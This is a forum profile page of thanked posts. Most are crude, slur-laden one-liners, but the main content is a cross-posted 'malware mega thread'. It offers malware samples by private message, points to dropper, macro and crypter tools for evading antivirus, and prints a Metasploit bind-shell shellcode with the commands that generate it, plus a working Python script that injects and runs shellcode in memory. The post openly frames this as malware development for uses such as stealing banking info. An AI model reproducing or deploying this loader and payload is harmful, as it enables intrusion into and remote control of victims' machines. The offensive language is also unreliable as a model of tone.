User Controls

  1. 1
  2. 2
  3. 3
  4. ...
  5. 46
  6. 47
  7. 48
  8. 49

Posts That Were Thanked by Bueno

  1. Emojis are the worst thing to come out of Japan since Dragon Ball Z.
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. A College Professor victim of incest [your moreover breastless limestone]
    đź’Żđź’Żđź’Ż
    The following users say it would be alright if the author of this post didn't die in a fire!
  3. A College Professor victim of incest [your moreover breastless limestone]
    The following users say it would be alright if the author of this post didn't die in a fire!
  4. Originally posted by Bill Krozby She told me last week when it was (i had no idea) and we are going to meet at the place we first met at a year ago. (her idea not mine)

    but anyways its good to know that we've had very few problems and like 95 percent of the time its been good. I really do love her she's my heart.

    She probably has stockholm syndrome
    The following users say it would be alright if the author of this post didn't die in a fire!
  5. aldra JIDF Controlled Opposition
    no

    market speculation is the opposite of what cryptocurrencies were designed for

    fuck you and your digital jediry
    The following users say it would be alright if the author of this post didn't die in a fire!
  6. Sophie Pedophile Tech Support
    4. Deployment & Encoding

    Any malware dev will tell you that getting your payload to he target undetected is perhaps the most important part in a malware campaign. Or any engagement in which malware might be leveraged to some end. Be it surveillance or stealing banking info for instance.

    For that reason i have decided to include some resources here that may be useful in that regard.

    First off under the category 'deployment' the Dr0p1t-framework can be used to create a stealthy malware dropper. A dropper is a piece of malware that downloads other kinds of malware to the target's machine.

    Secondly VBad is a fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It's the type of tool you'd use to spread your malware via malicious MS Office documents. The VBA script gets embedded in a Word document in example and when the Macro is activated it downloads the payload of your choice to the victim's machine and executes it.

    ThirdlypeCloakCapstone is a crypter. This piece of software is used in order to encode your payload in order to defeat AV solutions. It's a fork of PeCloak originally written by someone at Security Sift. You can read about the original project and how it operates by clicking here.


    5. Miscellaneous

    If you're interested in how Malware behaves in the wild, you might want to consider setting up a honeypot. It so happens there's one that is easily deployable, called HoneyPy. Check out the project's repo below.

    https://github.com/foospidy/HoneyPy

    The HoneyPy honeypots send their data to HoneyDB as well. Which keeps track of all the activity that takes place in the honeypot environments. It has a data visualization service as well. Check it out below.

    https://riskdiscovery.com/honeydb/

    For convenience sake i wrote a command line interface for HoneyDB so that you can keep track of all the activity from the comfort of your terminal. Download it directly from my repo at Github Or simply clone it.


    git clone https://github.com/NullArray/Mimir.git



    More?

    Please feel free to post all you malware related resources in this thread. Be it books, tools, code snippets, custom malware you wrote. Or techniques you like to employ. I am looking forward to reading your contributions!

    Post last edited by Sophie at 2017-12-11T08:34:06.882553+00:00
    The following users say it would be alright if the author of this post didn't die in a fire!
  7. Sophie Pedophile Tech Support
    Sup nigs. This is a cross post i made on a security forum and i thought you guys might enjoy it as well.

    I would encourage anyone that has any interesting information to add to do so. It wouldn't be a mega thread if we wouldn't add as much resources as possible.


    Table of Contents
    • 1. Analysis and RevEng Resources
    • 2. Samples, Open Source and Otherwise
    • 3. MalDev Resources, Technical & Techniques
    • 4. Deployment & Encoding
    • 5. Miscellaneous



    1. Analysis and Reverse Engineering Resources

    Personally i focus more on the development side of things but i've come across a few resources that i think will be useful to anyone trying to get more into the analysis side. Of course first and foremost; Practical Malware Analysis.Is the aspiring analyst's bible. It is complete with exercises and examples. Best practices and imparts solid foundational knowledge. It is in my opinion an excellent starting point.


    These presentation slides that i have found offer a quick overview of some of the tools, techniques and procedures that you will need to know before getting into any sort of work with regards to malware analysis. It discusses some points like risk reduction by implementing platform diversity. Such as using different operating systems in VM or otherwise to do your technical detective work. It goes into some VM basics and goes into how to create a safe environment among other things.

    Basically it's a summary of a lot of the important things to take into consideration. It's useful as a reference guide as well together with the Practical Malware Analysis ebook.

    When it comes to virtualization i like VMware a lot. They offer a free version of their product called VMware Player. That in my experience is pretty useful for testing malware on different platforms. The paid version called VMware Workstation offers more features that might be useful to you if you can afford to pay the 200$ price tag.

    I like to use Windows in VM on occasion to test certain types of malware out. Fortunately there's free images of the OS available from Microsoft's own website directly. Check out the available versions by clicking here.

    If you would like to perform some reverse engineering on your virtual Windows machine check out OllyDBG. I particularly enjoyed playing around with this debugger on Windows. A quick start guide can be found by clicking here.

    From a platform diversity standpoint you might want to do some of these tasks on Linux as well. In that case, you may be interested in REMnux. Which is a Linux distro that is built with the needs of the reverse engineer in mind, it comes pre-installed with a bunch of tools. Check out the distro at the link below.

    https://remnux.org/#distro

    A quick tool overview can be found at the link here;

    https://remnux.org/#tools

    To the best of my knowledge it doesn't come with a debugger that has a GUI. There are however Linux debuggers that come with graphical user interfaces. For instance, i like EDB-Debugger, it's my go-to Linux debugger. If i recall correctly it is based on OllyDBG. Below i have posted a shell script that automates the installation of EDB-Debuger if you're interested.


    #!/bin/bash

    # install dependencies
    sudo apt-get install \
    cmake \
    build-essential \
    libboost-dev \
    libqt5xmlpatterns5-dev \
    qtbase5-dev \
    qt5-default \
    libqt5svg5-dev \
    libgraphviz-dev \
    libcapstone-dev

    # build and run edb
    git clone --recursive https://github.com/eteran/edb-debugger.git
    cd edb-debugger
    mkdir build
    cd build
    cmake ..
    make

    # Comment this last one out if you don't want to run EDB after installation
    ./edb


    What this shell script does is install all the dependencies you need, after which it builds the debugger from source and starts it up for you. If it's run from your home directory, the EDB directory will be in your /home/ as well. In that case you can use an alias to start it from the command line by typing the following into your terminal.


    alias edb="cd ~/edb-debugger/build && ./edb"


    Now when you type `edb` it will start up for you. Alternatively you could make a symbolic link as well. But i find a simple alias to be just as effective in this case.

    To conclude this category make sure you bookmark the following repo on github.

    https://github.com/rshipp/awesome-malware-analysis

    As the name might suggest the repo contains a curated list of awesome malware analysis tools and resources. Definitely worth checking out!


    2. Samples, Open Source and Otherwise

    There are a number of places where one can go and find some interesting samples to play around with. I'll start off with some resources that can be found on Github.

    I have a repo forked on my Github that contains a list of Rootkits that can be downloaded from Github and a couple of other places. Check it out below.

    https://github.com/NullArray/RootKits-List-Download


    Furthermore i have compiled a small list of sites that offer malware samples as well.

    http://www.kernelmode.info/forum/viewforum.php?f=16
    https://virusshare.com/
    https://www.scumware.org/index.scumware
    http://malc0de.com/database/
    http://labs.sucuri.net/?malware
    https://zeustracker.abuse.ch/monitor.php?browse=binaries

    Alternatively i recently came across a project on Github that works by automatically searching a number of sites for malware samples. It's a bit outdated and i personally haven't used it but i thought it deserved a mention regardless so here's the tool.

    What's more, i am currently in the possession of about 50 malicious files and programs. Among which Trojans, Keyloggers, Worms and more. If you'd like to see if my collection might have something interesting for you, check out this paste where i posted a rough list of what i currently have. Send me a PM if you'd like to receive one or more of my samples.

    https://pastebin.com/dXetvYKk


    3. MalDev, Resources, Technical & Techniques.

    I'll start this section off by posting a couple of books. Since we'll be talking about malware development i decided to compile some resources for this thread that have to do with Assembly, Kernel Exploitation, Shellcode and since I am a Python programmer i will also be adding some e-books that deal with MalDev in Python.

    Kernel Exploitation: Attacking The Core. Deals with everything from shell code to CPU architecture, general kernel auditing and abusing Linux Privilege Models. Techniques that you might want to incorporate into your malware such as rootkits.

    Next up i have a collection of ebooks that delve into the world of Assembly. I had considered putting this under the Reverse Engineering section but i reckon that being good at Assembly is a plus for the analyst and developer as well. I've recently been trying to get more into it for that reason. Now, admittedly i don't have a lot of experience with it but i think it would be a good addition to this thread regardless. The books in question are as follows:


    Intel32-2-Instruction Set ReferenceA.pdf
    Intel32-2-Instruction Set ReferenceB.pdf
    Linux.Assembly.Language.Programming-2000.pdf
    Non-Executable Stack ARM Exploitation(def18).pdf
    No_NX.pdf
    On the Effectiveness of Address-Space Randomization.pdf
    pcasm.pdf
    The Art Of Assembly Language.pdf
    Understanding the Low Fragmentation Heap-BH10.pdf


    I've uploaded them to lewd.se which will keep them up for 90 days. So get them while you can if you're interested, by clicking here. However these books are also available this hidden service http://ytxmrc3pcbv5464e.onion/files/Infosec/ under the Security/Hacking zipfile.

    I also managed to find an introductory guide to win32 shell code.

    What i like about shell code and custom ASM that is converted to shell code is that it can be employed by Python. More specifically with the `ctypes` module and code injection techniques. A while ago i made a thread about this on the forum which i later adapted into a Medium article. To illustrate how this can be accomplished i will include some of the info i wrote in the article in this thread as well.


    Example; Custom ASM -> Shell Code -> Code Injection with Python

    If you have a sample of ASM that performs a specific operation such as spawning an OS shell or downloading and executing a binary from a remote host you might want to employ this functionality in Python to create a more powerful piece of software/malware.

    In order to do so however we can’t just copy/paste ASM directly into a Python script. Instead, Python reads the machine code in as a bytearray of shellcode where the binary data is represented by a hex value where the \x represents the offset.(Lanny's Note: The "\x" isn't really an "offset", it's just an escape code that signals the following two bytes in source are the hexadecimal representation of the next byte of the given string. The offset of a given byte is signaled its position in the literal expression.) If you’ve worked with Metasploit before or have experience with shell code in any other capacity you might recognize that this looks like the following.


    "\xb8\xee\x7c\x98\x76\xdb\xc6\xd9\x74\x24\xf4\x5b\x31\xc9"
    "\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x2d\x78\x7a\x83\x4d"
    "\x69\xf8\x6c\xad\x6a\x9d\xe5\x48\x5b\x9d\x92\x19\xcc\x2d"
    "\xd0\x4f\xe1\xc6\xb4\x7b\x72\xaa\x10\x8c\x33\x01\x47\xa3"
    "\xc4\x3a\xbb\xa2\x46\x41\xe8\x04\x76\x8a\xfd\x45\xbf\xf7"
    "\x0c\x17\x68\x73\xa2\x87\x1d\xc9\x7f\x2c\x6d\xdf\x07\xd1"
    "\x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\xf6\xfc"
    "\x7b\xf4\xcc\x8b\x7d\xdc\x1c\x73\xd1\x21\x91\x86\x2b\x66"
    "\x16\x79\x5e\x9e\x64\x04\x59\x65\x16\xd2\xec\x7d\xb0\x91"
    "\x57\x59\x40\x75\x01\x2a\x4e\x32\x45\x74\x53\xc5\x8a\x0f"
    "\x6f\x4e\x2d\xdf\xf9\x14\x0a\xfb\xa2\xcf\x33\x5a\x0f\xa1"
    "\x4c\xbc\xf0\x1e\xe9\xb7\x1d\x4a\x80\x9a\x49\xbf\xa9\x24"
    "\x8a\xd7\xba\x57\xb8\x78\x11\xff\xf0\xf1\xbf\xf8\xf7\x2b"
    "\x07\x96\x09\xd4\x78\xbf\xcd\x80\x28\xd7\xe4\xa8\xa2\x27"
    "\x08\x7d\x5e\x2f\xaf\x2e\x7d\xd2\x0f\x9f\xc1\x7c\xf8\xf5"
    "\xcd\xa3\x18\xf6\x07\xcc\xb1\x0b\xa8\xd0\x82\x85\x4e\x7e"
    "\x15\xc0\xd9\x16\xd7\x37\xd2\x81\x28\x12\x4a\x25\x60\x74"
    "\x4d\x4a\x71\x52\xf9\xdc\xfa\xb1\x3d\xfd\xfc\x9f\x15\x6a"
    "\x6a\x55\xf4\xd9\x0a\x6a\xdd\x89\xaf\xf9\xba\x49\xb9\xe1"
    "\x14\x1e\xee\xd4\x6c\xca\x02\x4e\xc7\xe8\xde\x16\x20\xa8"
    "\x04\xeb\xaf\x31\xc8\x57\x94\x21\x14\x57\x90\x15\xc8\x0e"
    "\x4e\xc3\xae\xf8\x20\xbd\x78\x56\xeb\x29\xfc\x94\x2c\x2f"
    "\x01\xf1\xda\xcf\xb0\xac\x9a\xf0\x7d\x39\x2b\x89\x63\xd9"
    "\xd4\x40\x20\xe9\x9e\xc8\x01\x62\x47\x99\x13\xef\x78\x74"
    "\x57\x16\xfb\x7c\x28\xed\xe3\xf5\x2d\xa9\xa3\xe6\x5f\xa2"
    "\x41\x08\xf3\xc3\x43"


    As alluded to, this is shell code generated by Metasploit, what this shell code does when executed, is open port 8899 on the target Windows machine and listens for incoming connections over TCP. Once a connection has been established it spawns an OS shell. You can reproduce it by entering the following commands into your instance of msfconsole.


    use payload/windows/shell/bind_tcp

    set LPORT 8899

    generate -b '\x00' -e x86/shikata_ga_nai -f /tmp/payload.txt


    This will save the generated shell code to a file called 'payload.txt' in your /tmp/ directory. The -b flag omits the use of a bad character(The null byte) and the -e flag sets the encoding scheme for the payload to 'shikata_ga_nai' on x86 architecture. More on generating payloads here.

    We can have this shellcode execute on our target machine by using the CreateRemoteThread method. Python's 'ctypes' library is excellent for this.


    import os
    import ctypes

    def execute():
    # Bind shell
    shellcode = bytearray(
    "\xb8\xee\x7c\x98\x76\xdb\xc6\xd9\x74\x24\xf4\x5b\x31\xc9"
    "\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x2d\x78\x7a\x83\x4d"
    "\x69\xf8\x6c\xad\x6a\x9d\xe5\x48\x5b\x9d\x92\x19\xcc\x2d"
    "\xd0\x4f\xe1\xc6\xb4\x7b\x72\xaa\x10\x8c\x33\x01\x47\xa3"
    "\xc4\x3a\xbb\xa2\x46\x41\xe8\x04\x76\x8a\xfd\x45\xbf\xf7"
    "\x0c\x17\x68\x73\xa2\x87\x1d\xc9\x7f\x2c\x6d\xdf\x07\xd1"
    "\x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\xf6\xfc"
    "\x7b\xf4\xcc\x8b\x7d\xdc\x1c\x73\xd1\x21\x91\x86\x2b\x66"
    "\x16\x79\x5e\x9e\x64\x04\x59\x65\x16\xd2\xec\x7d\xb0\x91"
    "\x57\x59\x40\x75\x01\x2a\x4e\x32\x45\x74\x53\xc5\x8a\x0f"
    "\x6f\x4e\x2d\xdf\xf9\x14\x0a\xfb\xa2\xcf\x33\x5a\x0f\xa1"
    "\x4c\xbc\xf0\x1e\xe9\xb7\x1d\x4a\x80\x9a\x49\xbf\xa9\x24"
    "\x8a\xd7\xba\x57\xb8\x78\x11\xff\xf0\xf1\xbf\xf8\xf7\x2b"
    "\x07\x96\x09\xd4\x78\xbf\xcd\x80\x28\xd7\xe4\xa8\xa2\x27"
    "\x08\x7d\x5e\x2f\xaf\x2e\x7d\xd2\x0f\x9f\xc1\x7c\xf8\xf5"
    "\xcd\xa3\x18\xf6\x07\xcc\xb1\x0b\xa8\xd0\x82\x85\x4e\x7e"
    "\x15\xc0\xd9\x16\xd7\x37\xd2\x81\x28\x12\x4a\x25\x60\x74"
    "\x4d\x4a\x71\x52\xf9\xdc\xfa\xb1\x3d\xfd\xfc\x9f\x15\x6a"
    "\x6a\x55\xf4\xd9\x0a\x6a\xdd\x89\xaf\xf9\xba\x49\xb9\xe1"
    "\x14\x1e\xee\xd4\x6c\xca\x02\x4e\xc7\xe8\xde\x16\x20\xa8"
    "\x04\xeb\xaf\x31\xc8\x57\x94\x21\x14\x57\x90\x15\xc8\x0e"
    "\x4e\xc3\xae\xf8\x20\xbd\x78\x56\xeb\x29\xfc\x94\x2c\x2f"
    "\x01\xf1\xda\xcf\xb0\xac\x9a\xf0\x7d\x39\x2b\x89\x63\xd9"
    "\xd4\x40\x20\xe9\x9e\xc8\x01\x62\x47\x99\x13\xef\x78\x74"
    "\x57\x16\xfb\x7c\x28\xed\xe3\xf5\x2d\xa9\xa3\xe6\x5f\xa2"
    "\x41\x08\xf3\xc3\x43")

    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
    ctypes.c_int(len(shellcode)),
    ctypes.c_int(0x3000),
    ctypes.c_int(0x40))

    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
    buf,
    ctypes.c_int(len(shellcode)))

    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_int(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0)))

    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),
    ctypes.c_int(-1))

    if __name__ == "__main__":
    execute()


    Executing the script will result in the shell code we have defined being run in memory. More on code injection here




    Say you have some custom ASM that you would like to employ in a similar manner. No problem, it so happens there’s a Linux utility to assist us with exactly that.

    In example, here’s some encoded ASM that I generated with an unrelated script. For the sake of brevity I will not post the entire program but a sample so that you get a feeling for what we’re converting here.


    xor eax,eax
    push eax
    push 0x22657841
    pop eax
    shr eax,0x08
    push eax
    mov eax,0x1d4f211f
    mov ebx,0x78614473
    xor eax,ebx
    push eax
    mov eax,0x3c010e70
    mov ebx,0x5567524a
    xor eax,ebx
    push eax
    mov eax,0x3c481145
    mov ebx,0x78736c6c
    xor eax,ebx
    push eax
    mov eax,0x4a341511
    mov ebx,0x6d516d74


    What the complete program does is download a binary from a remote host and run it. To convert this to a bytearray of shellcode we will use the utility called objdump and a regular expression using grep, after which the shellcode will be printed to the terminal. The commands for which are structured as follows.


    objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'


    Where you replace “PROGRAM” with the binary ASM file and if all went well, the proper shellcode will be printed to the terminal in the following format.


    \x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\xf6\xfc
    \x7b\xf4\xcc\x8b\x7d\xdc\x1c\x73\xd1\x21\x91\x86\x2b\x66
    \x16\x79\x5e\x9e\x64\x04\x59\x65\x16\xd2\xec\x7d\xb0\x91
    \x57\x59\x40\x75\x01\x2a\x4e\x32\x45\x74\x53\xc5\x8a\x0f


    All that's left is to add your newly formatted code as an argument to the bytearray method in the Python script from before like so.


    def execute():
    shellcode = bytearray(#---SHELLCODE GOES HERE---#)



    If you're interested in learning how to build python based Malware check out these books: Grey Hat python and Black Hat Python. they cover a lot of general security oriented subjects but especially Black hat Python has a focus on malicious software in the latter half of the book.

    If you're interested in a couple more examples of Python based Malware you can check out, my friend Sithis' Crypter Ransomware Project or perhaps one of the best Python based malwares out there in my opinion, called PuPy

    It might also be interesting to note that fairly recently a backdoor development framework was released on github by the name of Covertutils. It works a lot like msfvenom and allows you to easily generate backdoors. You can check it out here.
    The following users say it would be alright if the author of this post didn't die in a fire!
  1. 1
  2. 2
  3. 3
  4. ...
  5. 46
  6. 47
  7. 48
  8. 49
Jump to Top